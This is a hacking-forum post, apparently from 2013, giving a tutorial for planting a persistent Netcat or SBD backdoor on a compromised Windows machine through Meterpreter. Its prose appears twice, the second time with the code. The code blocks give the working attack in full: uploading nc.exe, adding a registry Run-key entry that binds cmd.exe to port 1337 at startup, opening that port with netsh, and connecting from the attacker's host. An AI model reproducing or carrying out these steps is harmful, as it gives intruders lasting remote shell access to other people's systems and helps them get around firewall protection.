Persistent Netcat/SBD Backdoor with Metasploit 05-13-2013, 11:53 PM
#1
Hello Sinisterly members. I will show you how to make a persistent Netcat backdoor with Metasploit, on a compromised system for example.
And we make the backdoor persistent by interacting with the system firewall and the registry.
Okay so let's start metasploit and upload Netcat or sbd.exe if you are looking for a netcat but with password protection for your shell. (BackTrack and Kali has it pre-installed)
I will be using Backtrack 5 in this tutorial.
The next step is to let Netcat listen on a random port, it does not really matter what port, but in this tutorial we'll be using port 1337. Then we want to bypass the system firewall and open the port on startup.
In order to do this we will be using the command "reg enumkey" and we will edit the key
It will look like this;
Next we will use commands to get netcat or sbd.exe running on startup and open port 1337 and listen to a connection.
Now we have to configure the system to allow remote connections through the firewall to our netcat or SBD.exe backdoor using the interactive command promprt and running a command called "netsh"
and to see if operational mode is enabled on our firewall.
As you can see here operational mode is enabled (fuck yeah). So our next step is to open port 1337 and use netcat or SBD.exe to connect to it.
Now in order to connect to our netcat or SBD.exe backdoor you would have to run the following command:
There we go, a persistent netcat/sbd.exe backdoor!
I hope you have enjoyed the tutorial.
Thanks to DES for teaching me this.
And we make the backdoor persistent by interacting with the system firewall and the registry.
Okay so let's start metasploit and upload Netcat or sbd.exe if you are looking for a netcat but with password protection for your shell. (BackTrack and Kali has it pre-installed)
I will be using Backtrack 5 in this tutorial.
Code:
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading : /tmp/nc.exe -> C:\windows\system32
[*] uploaded : /tmp/nc.exe -> C:\windows\system32nc.exeThe next step is to let Netcat listen on a random port, it does not really matter what port, but in this tutorial we'll be using port 1337. Then we want to bypass the system firewall and open the port on startup.
In order to do this we will be using the command "reg enumkey" and we will edit the key
Code:
'HKLM\software\microsoft\windows\currentversion\run'It will look like this;
Code:
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\runNext we will use commands to get netcat or sbd.exe running on startup and open port 1337 and listen to a connection.
Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 1337 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 1337 -e cmd.exeNow we have to configure the system to allow remote connections through the firewall to our netcat or SBD.exe backdoor using the interactive command promprt and running a command called "netsh"
and to see if operational mode is enabled on our firewall.
Code:
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ > netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode = EnableAs you can see here operational mode is enabled (fuck yeah). So our next step is to open port 1337 and use netcat or SBD.exe to connect to it.
Code:
C:\ > netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 1337 "NETCAT BACKDOOR" ENABLE ALL
Ok.
C:\ > netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
1337 TCP Enable NETCAT BACKDOOR
139 TCP Enable NetBIOS Session Service
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram ServiceNow in order to connect to our netcat or SBD.exe backdoor you would have to run the following command:
Code:
root@charon:~# nc -v 192.168.56.60 1337There we go, a persistent netcat/sbd.exe backdoor!
I hope you have enjoyed the tutorial.
Thanks to DES for teaching me this.
![[Image: bAMEI93.jpg]](http://i.imgur.com/bAMEI93.jpg)
Jabber: charon@exploit.im
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
